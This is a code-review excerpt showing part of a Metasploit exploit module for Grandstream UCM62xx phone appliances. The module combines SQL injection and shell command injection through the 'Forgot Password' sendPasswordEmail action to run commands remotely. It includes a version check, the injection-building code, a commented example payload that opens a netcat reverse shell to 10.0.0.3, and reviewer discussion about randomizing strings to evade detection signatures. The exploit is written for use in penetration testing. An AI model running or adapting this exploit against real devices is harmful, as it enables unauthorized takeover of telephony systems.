modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb

```diff
@@ -0,0 +1,176 @@
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  ##
+  # Sends a POST /cgi request with a payload of action=getInfo. The
+  # server should respond with a large json blob like the following,
+  # where "prog_version" is he firmware version:
+  #
+  # {"response"=>{
+  #   "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",
+  #   "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",
+  #   "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",
+  #    "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",
+  #    "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",
+  #    "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",
+  #    "support_webrtc_cloud"=>"0"}, "status"=>0}
+  ###
+  def check
+    normalized_uri = normalize_uri(target_uri.path, '/cgi')
+    print_status("Requesting version information from #{normalized_uri}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalized_uri,
+      'vars_post' => { 'action' => 'getInfo' }
+    })
+
+    return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown('No JSON in response') unless body_json
+
+    resp_json = body_json['response']
+    return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json
+
+    prog_version = resp_json['prog_version']
+    return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version
+
+    print_status("The reported version is: #{prog_version}")
+
+    version = Rex::Version.new(prog_version)
+    if version < Rex::Version.new('1.0.19.20')
+      return CheckCode::Appears('This determination is based on the version string.')
+    end
+
+    return CheckCode::Safe('This determination is based on the version string.')
+  end
+
+  ##
+  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
+  # and then it will get passed to a python script via sh which allows us to execute a command injection.
+  # It will look something like this:
+  #
+  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
+  #     password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
+  #
+  # This functionality is related to the"Forgot Password" feature. This function is rate limited by
+  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
+  # payloads are appropriate.
+  ###
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi'),
+      'vars_post' =>
+      {
+        'action' => 'sendPasswordEmail',
+        'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
```

Comment:
Randomize `z`?

Reply:
And `1=1`?

Reply:
I don't actually agree there is any value in randomization of 1=1. Any generic network signature for sql injection will catch this no matter the randomization. Furthermore, the follow-on `cmd` is a shell command which would be far better to write a signature for anyways.

Regardless, as per your request, I randomized the 1=1. I removed the `z` and set to the an empty string.